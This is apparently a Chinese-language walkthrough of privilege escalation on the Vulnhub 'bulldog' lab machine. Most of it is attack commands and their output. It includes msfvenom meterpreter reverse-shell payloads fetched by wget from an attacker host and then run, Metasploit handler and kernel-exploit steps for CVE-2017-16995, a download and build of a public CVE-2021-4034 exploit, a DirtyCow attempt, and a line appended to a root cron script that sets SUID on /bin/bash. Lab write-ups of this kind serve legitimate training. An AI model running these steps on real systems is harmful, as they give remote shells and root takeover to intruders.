Vulnhub 靶场渗透测试系列:bulldog(命令注入与 sudo 提权)
靶机地址:https://www.vulnhub.com/entry/bulldog-1%2C211/
脏牛(DirtyCow)提权失败(该漏洞于 2016 年公布,Ubuntu 16.04 可能已修补)
测试 Linux 是否存在 DirtyCow 漏洞
https://blog.csdn.net/lee_ham/article/details/82048681
curl -4LO https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c
gcc -static -pthread dirtyc0w.c -o dirtyc0w.s
root@bulldog:/tmp# su - django
-su-4.3$ id
uid=1001(django) gid=1001(django) groups=1001(django),27(sudo)
-su-4.3$ cd /tmp/
-su-4.3$
-su-4.3$ ./dirtyc0w.s foo m00000000000000000
mmap f77e3000
madvise 0
procselfmem -100000000
-su-4.3$ cat foo
this is not a test
-su-4.3$
CVE-2017-16995 提权成功
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.111.130 -a x86 -e x86/shikata_ga_nai --platform linux LPORT=4443 -f elf > x86.elf;
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.111.130 -a x64 -e x64/xor --platform linux LPORT=4444 -f elf > x64.elf;
wget 192.168.111.130/x86.elf;chmod 0777 x86.elf;./x86.elf&
wget 192.168.111.130/x64.elf;chmod 0777 x64.elf;./x64.elf&
msfconsole
handler -H 192.168.111.130 -P 4443 -p linux/x86/meterpreter/reverse_tcp
handler -H 192.168.111.130 -P 4444 -p linux/x64/meterpreter/reverse_tcp
set PAYLOAD linux/x86/meterpreter/reverse_tcp
use exploit/linux/local/bpf_sign_extension_priv_esc
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.111.130
set LPORT 4445
set session 7
run
CVE-2021-4034 提权成功
msf6 > info exploit/linux/local/pkexec # 该 Metasploit 模块利用失败(x86、x64 均失败),下方改用手动编译的 PoC
cd /tmp;
wget -4O CVE-2021-4034.tar.gz https://github.com/berdav/CVE-2021-4034/archive/refs/heads/main.tar.gz
tar -zxvf CVE-2021-4034.tar.gz;
cd CVE-2021-4034-main;ll;env;make;
ubuntu@ubuntu:/tmp/CVE-2021-4034-main$ make
django@bulldog:/tmp$ ./cve-2021-4034
# id
uid=0(root) gid=0(root) groups=0(root),27(sudo),1001(django)
#/usr/bin/pkexec --version
pkexec version 0.105
cron 计划任务(以 root 身份每分钟执行的脚本可被当前用户追加内容):
django@bulldog:/etc/cron.d$ ll
total 24
drwxr-xr-x 2 root root 4096 Aug 25 2017 ./
drwxr-xr-x 96 root root 4096 Jun 30 07:23 ../
-rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder
-rw-r--r-- 1 root root 589 Jul 16 2014 mdadm
-rw-r--r-- 1 root root 191 Aug 24 2017 popularity-contest
-rw-r--r-- 1 root root 54 Aug 25 2017 runAV
django@bulldog:/etc/cron.d$ cat runAV
*/1 * * * * root /.hiddenAVDirectory/AVApplication.py
django@bulldog:/etc/cron.d$
ls -al /.hiddenAVDirectory/AVApplication.py;
cat /.hiddenAVDirectory/AVApplication.py;
echo "import os;os.system('touch /tmp/12345;chmod u+s /bin/bash');">>/.hiddenAVDirectory/AVApplication.py;
django@bulldog:/tmp$ id
uid=1001(django) gid=1001(django) groups=1001(django),27(sudo)
django@bulldog:/tmp$ bash -p
bash-4.3# id
uid=1001(django) gid=1001(django) euid=0(root) groups=1001(django),27(sudo)
bash-4.3# ls -al /bin/bash
-rwsr-xr-x 1 root root 1037528 May 16 2017 /bin/bash
bash-4.3#